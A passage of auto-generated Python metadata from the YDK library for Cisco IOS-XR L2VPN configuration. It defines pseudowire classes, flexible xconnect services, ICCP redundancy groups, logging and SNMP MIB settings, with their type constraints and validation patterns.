_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
''' Pseudowire Switching Point Tlv
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
''' Back Up Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
''' List of Vlan-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Primary VLAN range, in the form of 1-3,5
,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Secondary VLAN range, in the form of 1-3,5
,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
''' List of G8032 Ring
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
